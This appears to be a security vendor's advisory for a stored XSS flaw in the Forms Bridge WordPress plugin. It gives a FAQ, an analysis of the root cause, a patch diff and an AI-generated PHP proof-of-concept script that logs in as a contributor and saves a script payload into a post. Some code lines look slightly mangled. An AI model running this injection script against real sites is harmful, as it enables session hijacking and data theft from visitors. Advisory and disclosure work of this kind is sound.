What is CVE-2026-1244?

CVE-2026-1244 is a stored Cross-Site Scripting (XSS) vulnerability in the Forms Bridge plugin for WordPress, affecting versions up to and including 4.2.5. It allows authenticated users with Contributor-level access and above to inject arbitrary JavaScript into posts or pages via the ‘id’ shortcode attribute.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping of the user-supplied ‘id’ parameter in the ‘financoop_campaign’ shortcode. An attacker can embed a malicious payload in the ‘id’ attribute, which gets executed when the content is viewed by other users.

Who is affected by this vulnerability?

Any WordPress site using the Forms Bridge plugin version 4.2.5 or earlier is affected. To check if your site is vulnerable, verify the plugin version in the WordPress admin dashboard under the Plugins section.

How can I fix or mitigate this issue?

To remediate this vulnerability, update the Forms Bridge plugin to version 4.3.0 or later, where the issue has been patched. Regularly check for updates to all plugins and themes to ensure your site remains secure.

What does the CVSS score of 6.4 indicate?

The CVSS score of 6.4 indicates a medium severity level, suggesting that while authentication is required to exploit the vulnerability, it can still have significant impacts on site visitors. This score reflects the potential for session hijacking and other malicious actions.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability can lead to session hijacking, defacement, or theft of sensitive data from users viewing the affected content. Since the attack is stored, it can affect multiple users over time, increasing the risk to site integrity.

How does the proof of concept demonstrate the issue?

The proof of concept shows how an attacker can use a crafted shortcode with a malicious ‘id’ attribute to execute JavaScript in the context of a user’s session. It illustrates the steps to log in as a contributor, edit a post, and save the malicious shortcode.

What steps should I take if I am using an affected version?

If you are using an affected version of the Forms Bridge plugin, immediately update to version 4.3.0 or later. Additionally, review user roles and permissions to limit access to trusted contributors only.

Is there a way to prevent similar vulnerabilities in the future?

To prevent similar vulnerabilities, implement best practices such as regular security audits, using security plugins that monitor for XSS vulnerabilities, and ensuring proper input validation and output escaping in custom code.

What should I do if I suspect exploitation of this vulnerability?

If you suspect that your site has been exploited, conduct a thorough investigation to identify any unauthorized changes or scripts. Restore from a clean backup if necessary, and change all user passwords to secure the site.

Where can I find more information about CVE-2026-1244?

More information about CVE-2026-1244 can be found on the official CVE database, security advisories from the plugin developer, and security-focused websites that track vulnerabilities in WordPress plugins.

How can I stay informed about future vulnerabilities?

Subscribe to security mailing lists, follow WordPress security blogs, and monitor the CVE database to stay informed about new vulnerabilities and patches for WordPress plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1244: Forms Bridge <= 4.2.5 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'id' Shortcode Attribute (forms-bridge)

CVE ID CVE-2026-1244

Plugin forms-bridge

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 4.2.5

Patched Version 4.3.0

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1244:
This vulnerability is an authenticated Stored Cross-Site Scripting (XSS) flaw in the Forms Bridge WordPress plugin, affecting versions up to and including 4.2.5. The vulnerability resides in the plugin’s Financoop add-on, specifically within the ‘financoop_campaign’ shortcode handler. Attackers with Contributor-level access or higher can inject arbitrary JavaScript into posts or pages, which executes when a user views the compromised content. The CVSS score of 6.4 reflects the requirement for authentication and the potential impact on site visitors.

The root cause is insufficient input sanitization and output escaping for the user-supplied ‘id’ attribute in the ‘financoop_campaign’ shortcode. The vulnerable code is located in the file `forms-bridge/addons/financoop/shortcodes.php`. In the patched version, line 54 shows the function `forms_bridge_financoop_shortcode_error` receives the shortcode attributes array `$atts`. The original code directly interpolates the user-controlled `$atts[‘id’]` value into a string to construct an API endpoint URL on line 58: `’endpoint’ => “/api/campaign/{$atts[‘id’]}”,`. This value is later echoed without proper escaping in the error message output, creating an XSS vector.

Exploitation requires an authenticated attacker with at least Contributor privileges to create or edit a post or page. The attacker embeds the vulnerable shortcode with a malicious ‘id’ attribute payload. For example: `[financoop_campaign id=”‘>alert(document.domain)” backend=”example”]`. When the post is saved and subsequently viewed, the plugin’s error handling function `forms_bridge_financoop_shortcode_error` outputs the unsanitized ‘id’ value within the page’s HTML, causing script execution in the victim’s browser. The attack vector is the WordPress editor, and the payload is delivered via the shortcode’s ‘id’ parameter.

The patch addresses the vulnerability by applying strict input validation to the ‘id’ parameter before its use. In the patched code at line 54 of `shortcodes.php`, the plugin calls `absint( $atts[‘id’] )` to convert the user input to a non-negative integer. This sanitized value `$campaign_id` is then used in the endpoint construction on line 58. The `absint()` function ensures the parameter cannot contain malicious characters, eliminating the XSS possibility. The patch also includes general code cleanup and improved output escaping in other parts of the file, but the core fix is the integer casting of the ‘id’ attribute.

Successful exploitation allows an attacker with Contributor-level access to inject arbitrary JavaScript into any post or page where they can embed the shortcode. This script executes in the context of the visiting user’s session, which could be an administrator. Impact includes session hijacking, defacement, theft of sensitive data from the page, or performing actions on behalf of the victim user. The stored nature of the attack means a single injection can affect multiple users over time.

Differential between vulnerable and patched code

Code Diff

--- a/forms-bridge/addons/brevo/class-brevo-addon.php
+++ b/forms-bridge/addons/brevo/class-brevo-addon.php
@@ -138,42 +138,22 @@
 	 * @return array
 	 */
 	public function get_endpoint_schema( $endpoint, $backend, $method = null ) {
-		$bytes    = random_bytes( 16 );
-		$bytes[6] = chr( ord( $bytes[6] ) & 0x0f | 0x40 );
-		$bytes[8] = chr( ord( $bytes[8] ) & 0x3f | 0x80 );
-		$uuid     = vsprintf( '%s%s-%s-%s-%s-%s%s%s', str_split( bin2hex( $bytes ), 4 ) );
+		if ( ! function_exists( 'yaml_parse' ) ) {
+			return array();
+		}

-		$response = wp_remote_get(
-			self::OAS_URL,
-			array(
-				'headers' => array(
-					'Accept'           => 'application/json',
-					'Host'             => 'developers.brevo.com',
-					'Referer'          => 'https://developers.brevo.com/reference/get_companies',
-					'Alt-Used'         => 'developers.brevo.com',
-					'User-Agent'       => 'Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0',
-					'X-Requested-With' => 'XMLHttpRequest',
-				),
-				'cookies' => array(
-					'anonymous_id'    => $uuid,
-					'first_referrer'  => 'https://app.brevo.com/',
-					'pscd'            => 'get.brevo.com',
-					'readme_language' => 'shell',
-					'readme_library'  => '{%22shell%22:%22curl%22}',
-				),
-			)
-		);
+		$response = wp_remote_get( self::OAS_URL );

 		if ( is_wp_error( $response ) ) {
 			return array();
 		}

-		$data = json_decode( $response['body'], true );
+		$data = yaml_parse( $response['body'] );
 		if ( ! $data ) {
 			return array();
 		}

-		$oa_explorer = new OpenAPI( $data['oasDefinition'] );
+		$oa_explorer = new OpenAPI( $data );

 		$method = strtolower( $method ?? 'post' );
 		$path   = preg_replace( '/^/vd+/', '', $endpoint );
--- a/forms-bridge/addons/financoop/shortcodes.php
+++ b/forms-bridge/addons/financoop/shortcodes.php
@@ -51,10 +51,12 @@
 		$atts['currency'] = $atts['currency'] ?? '€';

 		try {
+			$campaign_id = absint( $atts['id'] );
+
 			$bridge = new Financoop_Form_Bridge(
 				array(
 					'name'     => '__financoop-' . time(),
-					'endpoint' => "/api/campaign/{$atts['id']}",
+					'endpoint' => "/api/campaign/{$campaign_id}",
 					'backend'  => $atts['backend'],
 					'method'   => 'GET',
 				),
@@ -82,18 +84,10 @@
 		?><article class="financoop-campaign wp-block-group">
 	<div class="financoop-campaign-header">
 		<div class="financoop-campaign-state">
-		<?php
-		echo esc_html(
-			$campaign['state']
-		);
-		?>
+		<?php echo esc_html( $campaign['state'] ); ?>
 		</div>
 		<h3 class="wp-block-heading">
-		<?php
-		echo esc_html(
-			$campaign['name']
-		);
-		?>
+		<?php echo esc_html( $campaign['name'] ); ?>
 		</h3>
 		<?php if ( $campaign['description'] ) : ?>
 		<p><?php echo wp_kses_post( $campaign['description'] ); ?></p>
@@ -162,114 +156,49 @@
 	$progress = round( min( 100, $progress ), 2 );
 	$goal     = (int) $goal;

-	if ( $goal === 0 ) {
+	if ( 0 === $goal ) {
 		return '';
 	}

 	ob_start();
 	?>
-	<div class="financoop-campaign-progress" data-source="
-	<?php
-	echo esc_attr(
-		$source
-	);
-	?>
-	">
+	<div class="financoop-campaign-progress" data-source="<?php echo esc_attr( $source ); ?>">
 	<h4 class="wp-block-heading"><?php echo esc_html( $label ); ?></h4>

 	<p class="financoop-campaign-progress-item fraction">
-		<span class="label">
-		<?php
-		echo esc_html(
-			_x( 'Achieved', 'financoop campaign widget', 'forms-bridge' )
-		);
-		?>
-	: </span><span class="value">
-	<?php
-	echo number_format(
-		$amount,
-		2,
-		',',
-		'.'
-	);
-	?>
-	/ <span class="value">
-	<?php
-	echo number_format(
-		$goal,
-		2,
-		',',
-		'.'
-	);
-	?>
-<span class="unit"><?php echo esc_html( $currency ); ?></span></span>
+		<span class="label"><?php echo esc_html( _x( 'Achieved', 'financoop campaign widget', 'forms-bridge' ) ); ?>: </span>
+		<span class="value">
+			<?php echo number_format( $amount, 2, ',', '.' ); ?> / <?php echo number_format( $goal, 2, ',', '.' ); ?>
+			<span class="unit"><?php echo esc_html( $currency ); ?></span>
+		</span>
 	</p>

 	<p class="financoop-campaign-progress-item goal">
-		<span class="label">
-		<?php
-		echo esc_html(
-			_x( 'Goal', 'financoop campaign widget', 'forms-bridge' )
-		);
-		?>
-	: </span><span class="value">
-	<?php
-	echo number_format(
-		$goal,
-		2,
-		',',
-		'.'
-	);
-	?>
-	<span class="unit"><?php echo esc_html( $currency ); ?></span></span>
+		<span class="label"><?php echo esc_html( _x( 'Goal', 'financoop campaign widget', 'forms-bridge' ) ); ?>: </span>
+		<span class="value">
+			<?php echo number_format( $goal, 2, ',', '.' ); ?>
+			<span class="unit"><?php echo esc_html( $currency ); ?></span>
+		</span>
 	</p>

 	<p class="financoop-campaign-progress-item amount">
-		<span class="label">
-		<?php
-		echo esc_html(
-			_x( 'Received', 'financoop campaign widget', 'forms-bridge' )
-		);
-		?>
-	: </span><span class="value">
-	<?php
-	echo number_format(
-		$amount,
-		2,
-		',',
-		'.'
-	);
-	?>
-	<span class="unit"><?php echo esc_html( $currency ); ?></span></span>
+		<span class="label"><?php echo esc_html( _x( 'Received', 'financoop campaign widget', 'forms-bridge' ) ); ?>:</span>
+		<span class="value">
+			<?php echo number_format( $amount, 2, ',', '.' ); ?>
+			<span class="unit"><?php echo esc_html( $currency ); ?></span>
+		</span>
 	</p>

 	<p class="financoop-campaign-progress-item percentage">
-		<span class="label">
-		<?php
-		echo esc_html(
-			_x( 'Progress', 'financoop campaign widget', 'forms-bridge' )
-		);
-		?>
-		: </span><span class="value">
-		<?php
-		echo number_format(
-			$progress,
-			2,
-			',',
-			'.'
-		);
-		?>
-		<span class="unit">%</span></span>
+		<span class="label"><?php echo esc_html( _x( 'Progress', 'financoop campaign widget', 'forms-bridge' ) ); ?>: </span>
+		<span class="value">
+			<?php echo number_format( $progress, 2, ',', '.' ); ?>
+			<span class="unit">%</span>
+		</span>
 	</p>

 	<div class="financoop-campaign-progress-item progress-bar">
-		<progress value='
-		<?php
-		echo intval(
-			$progress
-		);
-		?>
-		' max='100'><?php echo $progress; ?> %</progress>
+		<progress value='<?php echo intval( $progress ); ?>' max='100'><?php echo intval( $progress ); ?> %</progress>
 	</div>
 </div>
 	<?php
@@ -376,7 +305,7 @@
 			array( 'id', 'backend', 'sources', 'currency' ),
 			function ( $handle, $attr ) use ( $atts ) {
 				if ( isset( $atts[ $attr ] ) ) {
-					$value    = implode( ',', (array) $atts[ $attr ] );
+					$value    = esc_html( implode( ',', (array) $atts[ $attr ] ) );
 					$handle[] = "{$attr}='{$value}'";
 				}

--- a/forms-bridge/addons/holded/jobs/appointment-dates.php
+++ b/forms-bridge/addons/holded/jobs/appointment-dates.php
@@ -1,9 +1,24 @@
 <?php
+/**
+ * Appointment dates Holded add-on job.
+ *
+ * @package formsbridge
+ */

 if ( ! defined( 'ABSPATH' ) ) {
 	exit();
 }

+/**
+ * Given a date string in format 'Y-m-d H:i:s' and a duration as a numeric value, it creates
+ * two payload fields:
+ *   - startDate: The date value in timestamp format.
+ *   - duration: As a float value with 1 as its fallback value.
+ *
+ * @param array $payload Bridge payload.
+ *
+ * @return array|WP_Error
+ */
 function forms_bridge_holded_appointment_dates( $payload ) {
 	$datetime = DateTime::createFromFormat( 'Y-m-d H:i:s', $payload['date'] );
 	if ( $datetime === false ) {
--- a/forms-bridge/addons/listmonk/class-listmonk-form-bridge.php
+++ b/forms-bridge/addons/listmonk/class-listmonk-form-bridge.php
@@ -32,14 +32,11 @@
 			$error_response = $response->get_error_data()['response'] ?? null;

 			$code = $error_response['response']['code'] ?? null;
-			if ( $code !== 409 ) {
+			if ( 409 !== $code ) {
 				return $response;
 			}

-			if (
-				! isset( $payload['email'] ) ||
-				$this->endpoint !== '/api/subscribers'
-			) {
+			if ( ! isset( $payload['email'] ) || '/api/subscribers' !== $this->endpoint ) {
 				return $response;
 			}

--- a/forms-bridge/addons/mailchimp/class-mailchimp-form-bridge.php
+++ b/forms-bridge/addons/mailchimp/class-mailchimp-form-bridge.php
@@ -54,13 +54,7 @@
 			}

 			if ( 'Member Exists' === $title ) {
-				if (
-					! preg_match(
-						'/(?<=lists/).+(?=/members)/',
-						$this->endpoint,
-						$matches
-					)
-				) {
+				if ( ! preg_match( '/(?<=lists/).+(?=/members)/', $this->endpoint, $matches ) ) {
 					return $response;
 				}

@@ -84,17 +78,15 @@
 					return $response;
 				}

-				$member_id =
-					$search_response['data']['exact_matches']['members'][0]['id'] ?? null;
+				$member_id = $search_response['data']['exact_matches']['members'][0]['id'] ?? null;

 				if ( ! $member_id ) {
 					return $response;
 				}

 				$update_endpoint = "/3.0/lists/{$list_id}/members/{$member_id}";
-				if (
-					strstr( $this->endpoint, 'skip_merge_validation' ) !== false
-				) {
+
+				if ( false !== strstr( $this->endpoint, 'skip_merge_validation' ) ) {
 					$update_endpoint .= '?skip_merge_validation=true';
 				}

--- a/forms-bridge/addons/odoo/jobs/mailing-contact.php
+++ b/forms-bridge/addons/odoo/jobs/mailing-contact.php
@@ -1,10 +1,26 @@
 <?php
+/**
+ * Update mailing contacts Odoo add-on job.
+ *
+ * @package formsbridge
+ */

 if ( ! defined( 'ABSPATH' ) ) {
 	exit();
 }

-function forms_brige_odoo_update_mailing_contact( $payload, $bridge ) {
+/**
+ * It performs a search request in order to find some mailing contact in Odoo by email. If found,
+ * then updates its list subscriptions and skip the submission. Otherwise returns the payload
+ * without changes and let the bridge to continue with the workflow.
+ *
+ * @param array            $payload Bridge payload.
+ * @param Odoo_Form_Bridge $bridge Bridge object.
+ *
+ * @return array|null|WP_Error
+ */
+function forms_bridge_odoo_update_mailing_contact( $payload, $bridge ) {
+	// Patch the current bridge and dispatch a search request by email to mailing.contacts.
 	$response = $bridge
 		->patch(
 			array(
@@ -16,10 +32,13 @@
 		)
 		->submit( array( array( 'email', '=', $payload['email'] ) ) );

+	// If no contact is found the response is a 404 Not Found error.
 	if ( ! is_wp_error( $response ) ) {
 		$contact_id = $response['data']['result'][0];
 		$list_ids   = $payload['list_ids'];

+		// Dispatch a `write` operation to update the `list_ids` field of the
+		// `mailing.contact` model.
 		$response = $bridge
 			->patch(
 				array(
@@ -31,10 +50,13 @@
 			)
 			->submit( array( $contact_id ), array( 'list_ids' => $list_ids ) );

+		// If Odoo returns an error, then return the error as the output of the job.
 		if ( is_wp_error( $response ) ) {
 			return $response;
 		}

+		// Otherwise, return an empty payload to abort the bridge submission. All work
+		// is done!
 		return;
 	}

@@ -47,7 +69,7 @@
 		'Search for a subscribed mailing contact, updates its subscriptions and skips if succeed',
 		'forms-bridge'
 	),
-	'method'      => 'forms_brige_odoo_update_mailing_contact',
+	'method'      => 'forms_bridge_odoo_update_mailing_contact',
 	'input'       => array(
 		array(
 			'name'     => 'email',
--- a/forms-bridge/addons/zoho/class-zoho-form-bridge.php
+++ b/forms-bridge/addons/zoho/class-zoho-form-bridge.php
@@ -70,7 +70,17 @@
 			2
 		);

-		$response = $this->backend()->$method(
+		$backend = $this->backend();
+
+		if ( ! $backend ) {
+			return new WP_Error(
+				'invalid_backend',
+				'The bridge does not have a valid backend',
+				(array) $this->data,
+			);
+		}
+
+		$response = $backend->$method(
 			$this->endpoint,
 			$payload,
 			array(),
--- a/forms-bridge/deps/http/includes/class-credential.php
+++ b/forms-bridge/deps/http/includes/class-credential.php
@@ -645,7 +645,7 @@
 			return;
 		}

-		$access_token = $this->data['access_token'];
+		$access_token = $this->data['access_token'] ?? null;
 		if ( ! $access_token ) {
 			return;
 		}
--- a/forms-bridge/deps/plugin/class-setting.php
+++ b/forms-bridge/deps/plugin/class-setting.php
@@ -231,22 +231,24 @@
 	 * Registers setting data on the database.
 	 *
 	 * @param array $data Setting data.
+	 * @param bool  $autoload Whether to load the option when WordPress starts up.
 	 *
 	 * @return bool Success status.
 	 */
-	public function add( $data ) {
-		return add_option( $this->option(), $data );
+	public function add( $data, $autoload = false ) {
+		return add_option( $this->option(), $data, '', $autoload );
 	}

 	/**
 	 * Updates setting data on the database.
 	 *
 	 * @param array $data New setting data.
+	 * @param bool  $autoload Whether to load the option when WordPress starts up.
 	 *
 	 * @return bool Success status.
 	 */
-	public function update( $data ) {
-		return update_option( $this->option(), $data );
+	public function update( $data, $autoload = false ) {
+		return update_option( $this->option(), $data, $autoload );
 	}

 	/**
--- a/forms-bridge/forms-bridge.php
+++ b/forms-bridge/forms-bridge.php
@@ -9,7 +9,7 @@
  * License URI:         http://www.gnu.org/licenses/gpl-2.0.html
  * Text Domain:         forms-bridge
  * Domain Path:         /languages
- * Version:             4.2.5
+ * Version:             4.3.0
  * Requires PHP:        8.0
  * Requires at least:   6.7
  *
--- a/forms-bridge/includes/class-addon.php
+++ b/forms-bridge/includes/class-addon.php
@@ -197,11 +197,7 @@
 						$registry = self::registry();
 						$addons   = array();
 						foreach ( self::$addons as $name => $addon ) {
-							$logo_path =
-							FORMS_BRIDGE_ADDONS_DIR .
-							'/' .
-							$addon::NAME .
-							'/assets/logo.png';
+							$logo_path = FORMS_BRIDGE_ADDONS_DIR . '/' . $addon::NAME . '/assets/logo.png';

 							if ( is_file( $logo_path ) && is_readable( $logo_path ) ) {
 								$logo = plugin_dir_url( $logo_path ) . 'logo.png';
--- a/forms-bridge/includes/class-form-bridge.php
+++ b/forms-bridge/includes/class-form-bridge.php
@@ -194,21 +194,25 @@
 					'default'     => array(),
 				),
 				'is_valid'      => array(
-					'description' => __(
-						'Validation result of the bridge setting',
-						'forms-bridge'
-					),
+					'description' => __( 'Validation result of the bridge setting', 'forms-bridge' ),
 					'type'        => 'boolean',
 					'default'     => true,
 				),
 				'enabled'       => array(
-					'description' => __(
-						'Boolean flag to enable/disable a bridge',
-						'forms-bridge'
-					),
+					'description' => __( 'Boolean flag to enable/disable a bridge', 'forms-bridge' ),
 					'type'        => 'boolean',
 					'default'     => true,
 				),
+				'allow_failure' => array(
+					'description' => __( 'Whether an error on bridge submission should stop the submission loop or not', 'forms-bridge' ),
+					'type'        => 'boolean',
+					'default'     => true,
+				),
+				'order'         => array(
+					'description' => __( 'Order in which the bridge should be submitted in the submission loop', 'forms-bridge' ),
+					'type'        => 'integer',
+					'default'     => -1,
+				),
 			),
 			'required'             => array(
 				'name',
@@ -221,6 +225,8 @@
 				'workflow',
 				'is_valid',
 				'enabled',
+				'allow_failure',
+				'order',
 			),
 			'additionalProperties' => false,
 		);
@@ -448,7 +454,11 @@

 		$backend = $this->backend();
 		if ( ! $backend ) {
-			return new WP_Error( 'invalid_bridge' );
+			return new WP_Error(
+				'invalid_backend',
+				'The bridge does not have a valid backend',
+				(array) $this->data,
+			);
 		}

 		$method = $this->method;
--- a/forms-bridge/includes/class-forms-bridge.php
+++ b/forms-bridge/includes/class-forms-bridge.php
@@ -283,7 +283,23 @@
 			return;
 		}

-		foreach ( $bridges as $bridge ) {
+		usort(
+			$bridges,
+			function ( $a, $b ) {
+				if ( 0 > $a->order ) {
+					return 1;
+				} elseif ( 0 > $b->order ) {
+					return -1;
+				}
+
+				return $a->order - $b->order;
+			}
+		);
+
+		$l = count( $bridges );
+		for ( $i = 0; $i < $l; ++$i ) {
+			$bridge = $bridges[ $i ];
+
 			if ( ! $bridge->enabled ) {
 				Logger::log(
 					'Skip submission for disabled bridge ' . $bridge->name
@@ -436,6 +452,15 @@
 					$payload ?? $submission,
 					$attachments ?? array()
 				);
+
+				if (
+					false === $bridge->allow_failure
+					&& count( $bridges ) > 1
+					&& $i < count( $bridges ) - 1
+				) {
+					Logger::log( 'Early exit from the submission loop due to an error', Logger::ERROR );
+					break;
+				}
 			} finally {
 				self::$current_bridge = null;
 			}
--- a/forms-bridge/includes/class-integration.php
+++ b/forms-bridge/includes/class-integration.php
@@ -197,10 +197,19 @@
 						$registry     = self::registry();
 						$integrations = array();
 						foreach ( self::$integrations as $name => $integration ) {
+							$logo_path = FORMS_BRIDGE_INTEGRATIONS_DIR . '/' . $integration::NAME . '/assets/logo.png';
+
+							if ( is_file( $logo_path ) && is_readable( $logo_path ) ) {
+								$logo = plugin_dir_url( $logo_path ) . 'logo.png';
+							} else {
+								$logo = '';
+							}
+
 							$integrations[ $name ] = array(
 								'name'    => $name,
 								'title'   => $integration::TITLE,
 								'enabled' => $registry[ $name ] ?? false,
+								'logo'    => $logo,
 							);
 						}

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1244 - Forms Bridge <= 4.2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'id' Shortcode Attribute

<?php
// CONFIGURATION
$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/post.php';
$username = 'contributor'; // Attacker's username
$password = 'password'; // Attacker's password
$post_id = 1; // ID of the post to edit (must be editable by the contributor)

// PAYLOAD - Malicious 'id' attribute for the financoop_campaign shortcode
// This payload will execute an alert when the error message is rendered.
$malicious_id = "'><script>alert('Atomic Edge XSS - ' + document.domain);</script>";
$shortcode = "[financoop_campaign id='{$malicious_id}' backend='dummy']";

// Initialize cURL session for WordPress login
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

// STEP 1: Get the login page to retrieve the nonce
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/wp-login.php');
$login_page = curl_exec($ch);

// Extract the login nonce (WordPress uses 'log' and 'pwd' fields, nonce is in _wpnonce)
preg_match('/name="_wpnonce" value="([^"]+)"/', $login_page, $matches);
$login_nonce = $matches[1] ?? '';

// STEP 2: Perform login
$post_data = http_build_query([
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => 'http://vulnerable-wordpress-site.com/wp-admin/',
    'testcookie' => '1',
    '_wpnonce' => $login_nonce
]);

curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/wp-login.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$login_result = curl_exec($ch);

// Check for successful login by looking for admin bar or dashboard
if (strpos($login_result, 'wp-admin') === false) {
    die('Login failed. Check credentials.');
}

// STEP 3: Get the post edit page to retrieve the post nonce
curl_setopt($ch, CURLOPT_URL, "{$target_url}?post={$post_id}&action=edit");
curl_setopt($ch, CURLOPT_POST, false);
$edit_page = curl_exec($ch);

// Extract the post update nonce (_wpnonce)
preg_match('/name="_wpnonce" value="([^"]+)"/', $edit_page, $matches);
$update_nonce = $matches[1] ?? '';

// Extract the post content textarea ID
preg_match('/id="content"([^>]+)?>([sS]*?)</textarea>/', $edit_page, $content_matches);
$original_content = $content_matches[2] ?? '';

// STEP 4: Update the post with the malicious shortcode
// Append the shortcode to the existing content
$new_content = $original_content . "nn{$shortcode}";

$update_data = http_build_query([
    'post_ID' => $post_id,
    'content' => $new_content,
    'action' => 'editpost',
    '_wpnonce' => $update_nonce,
    '_wp_http_referer' => "/wp-admin/post.php?post={$post_id}&action=edit",
    'post_title' => 'Test Post', // Keep original title
    'save' => 'Update'
]);

curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $update_data);
$update_result = curl_exec($ch);

// STEP 5: Verify the injection by viewing the post
curl_setopt($ch, CURLOPT_URL, 'http://vulnerable-wordpress-site.com/?p=' . $post_id);
curl_setopt($ch, CURLOPT_POST, false);
$view_page = curl_exec($ch);

// Check if the malicious payload is present in the page source
if (strpos($view_page, $malicious_id) !== false) {
    echo "SUCCESS: XSS payload injected into post ID {$post_id}.n";
    echo "Visit http://vulnerable-wordpress-site.com/?p={$post_id} to trigger the alert.n";
} else {
    echo "FAILURE: Payload not found in page source. The plugin may not be active or the shortcode format is incorrect.n";
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-1244?
Overview of the vulnerability
CVE-2026-1244 is a stored Cross-Site Scripting (XSS) vulnerability in the Forms Bridge plugin for WordPress, affecting versions up to and including 4.2.5. It allows authenticated users with Contributor-level access and above to inject arbitrary JavaScript into posts or pages via the ‘id’ shortcode attribute.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and output escaping of the user-supplied ‘id’ parameter in the ‘financoop_campaign’ shortcode. An attacker can embed a malicious payload in the ‘id’ attribute, which gets executed when the content is viewed by other users.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Forms Bridge plugin version 4.2.5 or earlier is affected. To check if your site is vulnerable, verify the plugin version in the WordPress admin dashboard under the Plugins section.
How can I fix or mitigate this issue?
Updating the plugin
To remediate this vulnerability, update the Forms Bridge plugin to version 4.3.0 or later, where the issue has been patched. Regularly check for updates to all plugins and themes to ensure your site remains secure.
What does the CVSS score of 6.4 indicate?
Understanding the severity
The CVSS score of 6.4 indicates a medium severity level, suggesting that while authentication is required to exploit the vulnerability, it can still have significant impacts on site visitors. This score reflects the potential for session hijacking and other malicious actions.
What are the practical risks associated with this vulnerability?
Potential impacts on users
Exploitation of this vulnerability can lead to session hijacking, defacement, or theft of sensitive data from users viewing the affected content. Since the attack is stored, it can affect multiple users over time, increasing the risk to site integrity.
How does the proof of concept demonstrate the issue?
Understanding the exploitation method
The proof of concept shows how an attacker can use a crafted shortcode with a malicious ‘id’ attribute to execute JavaScript in the context of a user’s session. It illustrates the steps to log in as a contributor, edit a post, and save the malicious shortcode.
What steps should I take if I am using an affected version?
Immediate actions to take
If you are using an affected version of the Forms Bridge plugin, immediately update to version 4.3.0 or later. Additionally, review user roles and permissions to limit access to trusted contributors only.
Is there a way to prevent similar vulnerabilities in the future?
Best practices for security
To prevent similar vulnerabilities, implement best practices such as regular security audits, using security plugins that monitor for XSS vulnerabilities, and ensuring proper input validation and output escaping in custom code.
What should I do if I suspect exploitation of this vulnerability?
Response actions
If you suspect that your site has been exploited, conduct a thorough investigation to identify any unauthorized changes or scripts. Restore from a clean backup if necessary, and change all user passwords to secure the site.
Where can I find more information about CVE-2026-1244?
Resources for further reading
More information about CVE-2026-1244 can be found on the official CVE database, security advisories from the plugin developer, and security-focused websites that track vulnerabilities in WordPress plugins.
How can I stay informed about future vulnerabilities?
Keeping up with security news
Subscribe to security mailing lists, follow WordPress security blogs, and monitor the CVE database to stay informed about new vulnerabilities and patches for WordPress plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations